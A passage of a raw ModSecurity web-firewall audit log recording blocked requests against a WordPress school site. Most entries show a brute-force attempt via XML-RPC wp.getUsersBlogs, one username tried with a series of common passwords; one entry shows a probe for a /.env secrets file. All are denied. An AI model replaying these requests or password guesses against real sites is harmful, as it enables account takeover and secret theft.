for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1faa865c-Z-- --ae1e956c-A-- [19/Apr/2025:20:46:43 +0700] aAOpQ3Na4dA2HllpK_N46gAAAJE 103.236.140.4 42454 103.236.140.4 8181 --ae1e956c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ae1e956c-C-- wp.getUsersBlogs wakakur london12 --ae1e956c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae1e956c-E-- --ae1e956c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070403642374 5568 (- - -) Stopwatch2: 1745070403642374 5568; combined=3971, p1=480, p2=3313, p3=0, p4=0, p5=104, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae1e956c-Z-- --16a5bc15-A-- [19/Apr/2025:20:47:49 +0700] aAOphXNa4dA2HllpK_N4_AAAAIo 103.236.140.4 42762 103.236.140.4 8181 --16a5bc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --16a5bc15-C-- wp.getUsersBlogs wakakur q1w2e3r4t5 --16a5bc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16a5bc15-E-- --16a5bc15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070469773143 5607 (- - -) Stopwatch2: 1745070469773143 5607; combined=3983, p1=498, p2=3215, p3=0, p4=0, p5=165, sr=89, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16a5bc15-Z-- --2aaad52a-A-- [19/Apr/2025:20:48:51 +0700] aAOpw-vDiFC_ir7MDwbiKwAAAFc 103.236.140.4 43088 103.236.140.4 8181 --2aaad52a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2aaad52a-C-- wp.getUsersBlogs wakakur 123789 --2aaad52a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2aaad52a-E-- --2aaad52a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070531506408 5103 (- - -) Stopwatch2: 1745070531506408 5103; combined=3464, p1=446, p2=2868, p3=0, p4=0, p5=88, sr=83, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2aaad52a-Z-- --96a70e40-A-- [19/Apr/2025:20:49:51 +0700] aAOp_0ruoUXZj665VUHy8gAAAMI 103.236.140.4 43352 103.236.140.4 8181 --96a70e40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --96a70e40-C-- wp.getUsersBlogs wakakur rootroot --96a70e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96a70e40-E-- --96a70e40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070591062637 5316 (- - -) Stopwatch2: 1745070591062637 5316; combined=3788, p1=470, p2=3151, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96a70e40-Z-- --1309ca44-A-- [19/Apr/2025:20:50:57 +0700] aAOqQevDiFC_ir7MDwbiQwAAAFg 103.236.140.4 43650 103.236.140.4 8181 --1309ca44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1309ca44-C-- wp.getUsersBlogs wakakur admin@888 --1309ca44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1309ca44-E-- --1309ca44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070657388197 5530 (- - -) Stopwatch2: 1745070657388197 5530; combined=3917, p1=488, p2=3263, p3=0, p4=0, p5=96, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1309ca44-Z-- --bb55cb64-A-- [19/Apr/2025:20:51:57 +0700] aAOqfUruoUXZj665VUHzKAAAANg 103.236.140.4 43990 103.236.140.4 8181 --bb55cb64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb55cb64-C-- wp.getUsersBlogs wakakur account --bb55cb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb55cb64-E-- --bb55cb64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070717761574 5298 (- - -) Stopwatch2: 1745070717761574 5298; combined=4070, p1=490, p2=3394, p3=0, p4=0, p5=109, sr=92, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb55cb64-Z-- --0c6e5a3d-A-- [19/Apr/2025:20:52:56 +0700] aAOquOvDiFC_ir7MDwbiZQAAAFc 103.236.140.4 44268 103.236.140.4 8181 --0c6e5a3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.29.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.29.211 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --0c6e5a3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c6e5a3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745070776593669 805 (- - -) Stopwatch2: 1745070776593669 805; combined=358, p1=312, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c6e5a3d-Z-- --dcc5976e-A-- [19/Apr/2025:20:52:59 +0700] aAOqu3Na4dA2HllpK_N5VQAAAJE 103.236.140.4 44276 103.236.140.4 8181 --dcc5976e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dcc5976e-C-- wp.getUsersBlogs wakakur 123abc --dcc5976e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc5976e-E-- --dcc5976e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070779127488 5647 (- - -) Stopwatch2: 1745070779127488 5647; combined=4005, p1=475, p2=3361, p3=0, p4=0, p5=100, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc5976e-Z-- --17933035-A-- [19/Apr/2025:20:54:01 +0700] aAOq-UruoUXZj665VUHzbwAAAMQ 103.236.140.4 44614 103.236.140.4 8181 --17933035-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --17933035-C-- wp.getUsersBlogs wakakur 123312 --17933035-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17933035-E-- --17933035-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070841639779 5426 (- - -) Stopwatch2: 1745070841639779 5426; combined=3844, p1=513, p2=3169, p3=0, p4=0, p5=96, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17933035-Z-- --52161170-A-- [19/Apr/2025:20:55:02 +0700] aAOrNnNa4dA2HllpK_N5fQAAAIM 103.236.140.4 45000 103.236.140.4 8181 --52161170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --52161170-C-- wp.getUsersBlogs wakakur asdsa --52161170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52161170-E-- --52161170-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070902008778 4561 (- - -) Stopwatch2: 1745070902008778 4561; combined=3126, p1=425, p2=2555, p3=0, p4=0, p5=85, sr=72, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52161170-Z-- --0762644f-A-- [19/Apr/2025:20:56:02 +0700] aAOrcuvDiFC_ir7MDwbiswAAAEY 103.236.140.4 45300 103.236.140.4 8181 --0762644f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0762644f-C-- wp.getUsersBlogs wakakur soccer --0762644f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0762644f-E-- --0762644f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070962146358 5089 (- - -) Stopwatch2: 1745070962146358 5089; combined=3990, p1=475, p2=3326, p3=0, p4=0, p5=111, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0762644f-Z-- --5624b760-A-- [19/Apr/2025:20:57:06 +0700] aAOrsg6cTFSgLAHl7PrVTgAAAAU 103.236.140.4 45582 103.236.140.4 8181 --5624b760-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5624b760-C-- wp.getUsersBlogs wakakur qqii --5624b760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5624b760-E-- --5624b760-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071026323568 5262 (- - -) Stopwatch2: 1745071026323568 5262; combined=3911, p1=481, p2=3256, p3=0, p4=0, p5=102, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5624b760-Z-- --fd0ff612-A-- [19/Apr/2025:20:58:07 +0700] aAOr70ruoUXZj665VUHz0gAAANg 103.236.140.4 45896 103.236.140.4 8181 --fd0ff612-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fd0ff612-C-- wp.getUsersBlogs wakakur hunter --fd0ff612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd0ff612-E-- --fd0ff612-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071087483096 5628 (- - -) Stopwatch2: 1745071087483096 5628; combined=3980, p1=510, p2=3259, p3=0, p4=0, p5=137, sr=88, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd0ff612-Z-- --6e40ba1c-A-- [19/Apr/2025:20:59:07 +0700] aAOsK-vDiFC_ir7MDwbi7wAAAE4 103.236.140.4 46226 103.236.140.4 8181 --6e40ba1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6e40ba1c-C-- wp.getUsersBlogs wakakur Chegg123 --6e40ba1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e40ba1c-E-- --6e40ba1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071147347581 5125 (- - -) Stopwatch2: 1745071147347581 5125; combined=3781, p1=461, p2=3151, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e40ba1c-Z-- --33e7db45-A-- [19/Apr/2025:21:00:07 +0700] aAOsZ0ruoUXZj665VUH0IQAAAMI 103.236.140.4 46496 103.236.140.4 8181 --33e7db45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --33e7db45-C-- wp.getUsersBlogs wakakur hockey --33e7db45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33e7db45-E-- --33e7db45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071207265128 5383 (- - -) Stopwatch2: 1745071207265128 5383; combined=3849, p1=492, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e7db45-Z-- --547e3e62-A-- [19/Apr/2025:21:01:09 +0700] aAOspQ6cTFSgLAHl7PrVnwAAAAs 103.236.140.4 46804 103.236.140.4 8181 --547e3e62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --547e3e62-C-- wp.getUsersBlogs wakakur evite --547e3e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --547e3e62-E-- --547e3e62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071269907222 5868 (- - -) Stopwatch2: 1745071269907222 5868; combined=4081, p1=496, p2=3412, p3=0, p4=0, p5=102, sr=98, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 